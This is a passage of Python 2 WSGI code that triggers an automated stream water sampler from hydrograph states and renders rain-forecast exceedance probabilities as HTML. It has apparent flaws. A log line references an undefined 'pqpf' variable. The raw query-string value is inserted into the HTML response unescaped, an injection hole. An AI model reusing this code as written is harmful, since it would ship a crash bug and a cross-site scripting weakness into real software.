            algorithm_enabled = get_current_value(channel='enable_sampler')

            if algorithm_enabled > 0:
                # # Take a sample if conditions are met
                # if dxdt[-1] >= min_dflow :  # Water level is rising faster than min_dflow
                #   flag = not( sampled_recently(duration = 30) )
                #   if ( flag ):
                #     post_trigger()
                #     logger.info("Received message from worker: dQ/dt: %f and 30+ minutes since a sample" % dxdt[-1])

                # elif pqpf >= 0.50 :  # Probability of exceeding rainfall is greater than 50%
                #   flag = not( sampled_recently(duration = 60) )
                #   if ( flag ):
                #     post_trigger()
                #     logger.info("Received message from worker: pqpf: %2.2f and 60+ minutes since a sample" % pqpf*100)

                current_state = get_current_value(channel='hydrograph_state')
                depth_peak = get_current_value(channel='depth_peak')
                depth_base = get_current_value(channel='depth_base')
                dxdt_max = get_current_value(channel='delta_depth_max')
                pqpf_list = get_history(channel='p_rain')[0]
                depth_list = get_history(channel='depth_sonic')[0]
                # 3-pt Welch window: weighted average of the last three PQPF values
                pqpf_avg = (.3 * pqpf_list[-3] + .4 * pqpf_list[-2] +
                            .3 * pqpf_list[-1])
                depth = depth_list[-1]
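                # Rough summary of the hydrograph state machine below (the state
                # constants BASEFLOW/RISING/PEAKING/PEAK/FALLING are assumed to be
                # defined elsewhere in this application):
                #   -> RISING            : level rising faster than min_dflow
                #   RISING   -> PEAKING  : still rising, but slower than dxdt_max
                #   PEAKING  -> RISING   : rise rate starts increasing again
                #   RISING/PEAKING -> PEAK : rise rate drops to zero or below
                #   PEAK     -> FALLING  : level has receded below 75% of its peak rise
                #   FALLING  -> BASEFLOW : level is back within 10% of baseflow
                # While at BASEFLOW, a forecast chance of rain >= 10% also refreshes
                # depth_base and may trigger a sample. Most transitions call
                # post_trigger() unless a sample was taken recently.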

                # CHECK THIS
                if dxdt[-1] >= min_dflow:  # Water level is rising faster than min_dflow
                    # Default to no sample so 'flag' is always defined below
                    flag = False
                    # hydrograph is now rising
                    if not (current_state == RISING
                            or current_state == PEAKING):
                        current_state = RISING
                        # take sample if one hasn't been taken in past 10 mins
                        flag = not (sampled_recently(duration=10))

                    # inflection in hydrograph: discharge started increasing again
                    # before a peak was reached
                    elif current_state == PEAKING and dxdt[-1] > dxdt[-2]:
                        current_state = RISING
                        # take sample if one hasn't been taken in past 10 mins
                        flag = not (sampled_recently(duration=10))

                    if (flag):
                        post_trigger()

                        logger.info(
                            "Received message from worker: dQ/dt: %f triggered and 10+ minutes since a sample"
                            % dxdt[-1])

                    if dxdt[-1] > dxdt_max:  # update dxdt_max
                        #dxdt_max = dxdt[-1]
                        update_channel(channel='delta_depth_max',
                                       value=dxdt[-1])

                if current_state == BASEFLOW and pqpf_avg / 100 >= 0.10:
                    update_channel(
                        channel='depth_base',
                        value=depth)  # update depth_base to baseflow value

                    flag = not (sampled_recently(duration=120))
                    if (flag):
                        post_trigger()
                        logger.info(
                            "Received message from worker: pqpf: %2.2f and 120+ minutes since a sample"
                            % (pqpf * 100))

                if current_state == RISING and 0 < dxdt[-1] < dxdt_max:
                    # hydrograph was rising, but now the rate is slowing down
                    current_state = PEAKING

                    # take sample if one hasn't been taken in past 10 mins
                    flag = not (sampled_recently(duration=10))
                    if (flag):
                        post_trigger()

                    logger.info(
                        "Received message from worker: dQ/dt: %f falling" %
                        dxdt[-1])

                elif (current_state == RISING
                      or current_state == PEAKING) and dxdt[-1] <= 0:
                    # hydrograph has stopped rising and is now transitioning to falling limb
                    current_state = PEAK
                    #depth_peak = depth  # update depth_peak to value closest to peak
                    update_channel(channel='depth_peak', value=depth)

                    # take sample if one hasn't been taken in past 10 mins
                    flag = not (sampled_recently(duration=10))
                    if (flag):
                        post_trigger()

                    logger.info(
                        "Received message from worker: dQ/dt max: %f now increasing less"
                        % dxdt_max)

                elif current_state == PEAK and depth >= (
                        depth_base - .75 * (depth_base - depth_peak)):
                    # for ultrasonic, depth_base is always greater than depth_peak
                    # hydrograph now on falling limb.  Currently below 75% max
                    current_state = FALLING

                    # take sample if one hasn't been taken in past 10 mins
                    flag = not (sampled_recently(duration=10))
                    if (flag):
                        post_trigger()

                    logger.info(
                        "Received message from worker: Falling past .75 max depth"
                    )

                # Sample if hydrograph rises back above 75% max
                # elif current_state == FALLING and depth < (depth_base - .75*(depth_base - depth_peak)) :
                #   # for ultrasonic, depth_base is always greater than depth_peak
                #   current_state = RISING
                #   if dxdt[-1] > dxdt_max: # update dxdt_max
                #     #dxdt_max = dxdt[-1]
                #     update_channel(channel='delta_depth_max',value=dxdt[-1])
                #
                #   # take sample if one hasn't been taken in past 60 mins
                #   flag = not( sampled_recently(duration = 60) )
                #   if ( flag ):
                #     post_trigger()
                #     logger.info("Received message from worker: Rising past .75 max depth")

                # Hydrograph is approaching baseflow.  Reset depth variables
                elif current_state == FALLING and depth >= (
                        depth_base - .10 * (depth_base - depth_peak)):
                    # for ultrasonic, depth_base is always greater than depth_peak
                    current_state = BASEFLOW
                    update_channel(channel='depth_peak',
                                   value=depth_base)  #depth_peak = depth_base
                    update_channel(channel='delta_depth_max',
                                   value=0)  #dxdt_max = 0

                    # take sample if one hasn't been taken in past 10 mins
                    flag = not (sampled_recently(duration=10))
                    if (flag):
                        post_trigger()

                    logger.info(
                        "Received message from worker: Returning to baseflow")

                update_channel(channel='hydrograph_state', value=current_state)

        except (TypeError, ValueError):
            logger.warning('Error retrieving request body for async work.')

    elif method == 'GET':
        #https://gist.github.com/davidbgk/1311056
        d = parse_qs(environ['QUERY_STRING'])  # turns the qs to a dict

        query = 'From GET: %s' % ''.join('%s: %s' % (k, v)
                                         for k, v in d.iteritems())
        logger.info("Received message from worker: %s" % query)

        if 'pqpf' in d:

            parsed_json = get_forecast(url)

            hour = []
            pop = []
            qpf = []
            for entry in parsed_json['hourly_forecast']:
                hour.append(
                    time.strftime('%Y-%m-%d %H:%M',
                                  time.gmtime(float(entry['FCTTIME']['epoch']))))
                pop.append(float(entry['pop']) / 100)
                qpf.append(float(entry['qpf']['english']))  # or 'metric'

            poe = calc_pqpf(float(d['pqpf'][0]), pop, qpf)
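            # poe[x] is the probability that hour x's precipitation exceeds the
            # threshold requested in the query string (d['pqpf'][0]).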

            out = '<br>'
            for x in range(0, 12):
                out += "Forecast for %16s GMT.....POP %2d...QPF %4s...PoE(%.2f) %2.2f <br>" % (
                    hour[x], pop[x] * 100, qpf[x], float(
                        d['pqpf'][0]), poe[x] * 100)

            url_info['amt'] = d['pqpf'][0]
            url_info['pqpf_str'] = out

        else:

            url_info['amt'] = amt
            url_info[
                'pqpf_str'] = '<a href="?pqpf=0.2">Click</a> to Show Forecast'

    status = '200 OK'
    headers = [('Content-type', 'text/html')]

    start_response(status, headers)

    return [response.format(**url_info)]
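
A minimal sketch of the POST-body handling at the top of this handler, assuming the same "body=<url-encoded JSON>" payload format: percent-decode the raw WSGI body with urllib2.unquote, strip the leading form key, and parse the JSON. The helper name decode_worker_body is illustrative, not part of the example.

import json
import urllib2

def decode_worker_body(environ):
    # Read the raw request body from the WSGI input stream.
    size = int(environ.get('CONTENT_LENGTH') or 0)
    raw = environ['wsgi.input'].read(size)
    # Percent-decode, then drop the leading "body=" form key
    # before parsing the JSON document.
    decoded = urllib2.unquote(raw).decode('utf-8')
    return json.loads(decoded[len('body='):])
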